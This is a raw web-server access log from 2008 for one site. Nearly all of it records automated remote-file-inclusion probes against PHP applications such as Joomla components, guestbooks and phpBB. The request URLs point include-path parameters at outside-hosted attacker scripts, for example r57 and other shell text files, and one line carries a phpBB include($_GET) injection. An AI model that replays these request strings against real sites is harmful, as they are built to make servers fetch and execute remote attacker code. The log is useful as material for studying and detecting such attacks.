77.244.44.10 - - [24/May/2008:09:00:01 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:00:02 -0700] "GET /logs/access_080101.log//Guestbook/admin.php?include_path=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:00:02 -0700] "GET //Guestbook/admin.php?include_path=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:09:00:02 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:00:02 -0700] "GET /logs//Guestbook/admin.php?include_path=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.108.64.164 - - [24/May/2008:09:00:36 -0700] "GET /logs/access_080125.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [24/May/2008:09:00:37 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [24/May/2008:09:00:37 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [24/May/2008:09:00:38 -0700] "GET /logs/access_080121.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.180 - - [24/May/2008:09:01:59 -0700] "GET /logs/access.log HTTP/1.0" 200 1997 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.239.157.10 - - [24/May/2008:09:02:05 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.157.10 - - [24/May/2008:09:02:09 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 200 11590 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.157.10 - - [24/May/2008:09:02:58 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.157.10 - - [24/May/2008:09:02:59 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.64.164 - - [24/May/2008:09:03:16 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [24/May/2008:09:03:17 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.228 - - [24/May/2008:09:03:43 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.59.228 - - [24/May/2008:09:03:43 -0700] "GET //includes/messages.inc.php?include_path=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.59.228 - - [24/May/2008:09:03:44 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:03:52 -0700] "GET /logs/access_080211.log//Guestbook/admin.php?include_path=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
195.138.224.8 - - [24/May/2008:09:04:23 -0700] "GET /logs/access_080107.log/addevent.inc.php?agendax_path=http://www.b470-killer.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:09:04:42 -0700] "GET /logs//common/db.php?commonpath=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:09:04:42 -0700] "GET //common/db.php?commonpath=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:05:36 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:05:36 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:05:37 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:05:38 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [24/May/2008:09:05:40 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [24/May/2008:09:05:41 -0700] "GET //includes/messages.inc.php?include_path=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [24/May/2008:09:05:41 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.134.92 - - [24/May/2008:09:05:46 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/lasenudalnet/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.112.193.46 - - [24/May/2008:09:06:17 -0700] "GET /logs//_theme/breadcrumb.php?rootBase=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [24/May/2008:09:06:17 -0700] "GET //_theme/breadcrumb.php?rootBase=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [24/May/2008:09:06:42 -0700] "GET /logs/access_080215.log//index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [24/May/2008:09:06:44 -0700] "GET //index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [24/May/2008:09:06:45 -0700] "GET /logs//index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:09:07:37 -0700] "GET /logs/access_080211.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:09:07:37 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:09:07:54 -0700] "GET /logs/access_080211.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:09:07:55 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.24.145 - - [24/May/2008:09:07:58 -0700] "GET /logs/index.php?lang=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.145 - - [24/May/2008:09:08:04 -0700] "GET /index.php?lang=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:09:08:15 -0700] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:09:08:26 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.146.59.228 - - [24/May/2008:09:08:30 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.59.228 - - [24/May/2008:09:08:30 -0700] "GET //includes/messages.inc.php?include_path=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:09:08:31 -0700] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.137.79 - - [24/May/2008:09:09:16 -0700] "GET /logs/access_080131.log//Guestbook/admin.php?include_path=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.218.137.79 - - [24/May/2008:09:09:17 -0700] "GET //Guestbook/admin.php?include_path=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.218.137.79 - - [24/May/2008:09:09:17 -0700] "GET /logs//Guestbook/admin.php?include_path=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.129.31 - - [24/May/2008:09:09:44 -0700] "GET //index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.157.10 - - [24/May/2008:09:10:24 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.157.10 - - [24/May/2008:09:10:30 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 200 11590 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:09:10:39 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.86.181.227 - - [24/May/2008:09:11:11 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.184.171.65 - - [24/May/2008:09:11:13 -0700] "GET /logs//ashnews.php?pathtoashnews=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
12.184.171.65 - - [24/May/2008:09:11:13 -0700] "GET /logs//ashnews.php?pathtoashnews=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
12.184.171.65 - - [24/May/2008:09:11:14 -0700] "GET //ashnews.php?pathtoashnews=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
12.184.171.65 - - [24/May/2008:09:11:14 -0700] "GET //ashnews.php?pathtoashnews=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.67.176 - - [24/May/2008:09:11:16 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [24/May/2008:09:11:16 -0700] "GET //includes/messages.inc.php?include_path=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:09:12:01 -0700] "GET /logs/access_080211.log//Guestbook/admin.php?include_path=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:09:12:01 -0700] "GET //Guestbook/admin.php?include_path=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:09:12:01 -0700] "GET /logs//Guestbook/admin.php?include_path=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:09:12:01 -0700] "GET /logs/access_080131.log//Guestbook/admin.php?include_path=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:09:12:32 -0700] "GET /logs//main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:09:12:32 -0700] "GET /logs//main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:09:12:33 -0700] "GET //main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:09:12:33 -0700] "GET //main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:09:12:34 -0700] "GET /logs//index.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://www.geocities.com/koeluna/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
193.111.11.7 - - [24/May/2008:09:12:36 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:09:12:39 -0700] "GET //index.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://www.geocities.com/koeluna/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
193.111.11.7 - - [24/May/2008:09:12:41 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:09:12:46 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/koeluna/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:09:13:01 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:09:13:01 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
213.218.137.79 - - [24/May/2008:09:13:19 -0700] "GET /logs/access_080211.log//Guestbook/admin.php?include_path=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:09:13:37 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:09:13:38 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:09:13:56 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:09:13:56 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
84.21.71.133 - - [24/May/2008:09:14:26 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [24/May/2008:09:14:26 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:09:14:30 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:09:14:31 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:09:14:31 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:09:14:32 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.68.66 - - [24/May/2008:09:14:33 -0700] "GET /logs//includes/messages.inc.php?include_path=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [24/May/2008:09:14:34 -0700] "GET //includes/messages.inc.php?include_path=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.239.157.10 - - [24/May/2008:09:14:58 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.157.10 - - [24/May/2008:09:14:59 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.197.68.66 - - [24/May/2008:09:15:01 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [24/May/2008:09:15:01 -0700] "GET //includes/messages.inc.php?include_path=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [24/May/2008:09:15:02 -0700] "GET /logs//includes/messages.inc.php?include_path=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.134.92 - - [24/May/2008:09:15:08 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/lasenudalnet/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.134.92 - - [24/May/2008:09:15:08 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/lasenudalnet/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [24/May/2008:09:15:20 -0700] "GET //includes/messages.inc.php?include_path=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:09:15:26 -0700] "GET /logs/access_080325.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:09:15:26 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.239.157.10 - - [24/May/2008:09:15:28 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.157.10 - - [24/May/2008:09:15:34 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 200 11590 "-" "Mozilla/5.0" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:09:15:40 -0700] "GET /logs//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:09:15:41 -0700] "GET //includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.234.129.249 - - [24/May/2008:09:15:41 -0700] "GET /logs/modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.234.129.249 - - [24/May/2008:09:15:46 -0700] "GET /modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.58.186 - - [24/May/2008:09:15:51 -0700] "GET /logs/access_080215.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.67.24.145 - - [24/May/2008:09:16:31 -0700] "GET /logs/index.php?view=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.145 - - [24/May/2008:09:16:38 -0700] "GET /index.php?view=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.91 - - [24/May/2008:09:16:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.8.91 - - [24/May/2008:09:16:49 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
84.21.71.133 - - [24/May/2008:09:17:11 -0700] "GET /logs/access_080109.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:09:17:48 -0700] "GET /logs//index.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://www.geocities.com/koeluna/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:09:17:51 -0700] "GET /logs/access_080218.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:09:17:53 -0700] "GET //index.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://www.geocities.com/koeluna/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
193.111.11.7 - - [24/May/2008:09:18:01 -0700] "GET /logs/access_080327.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:09:18:29 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:09:18:29 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:09:18:49 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/koeluna/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
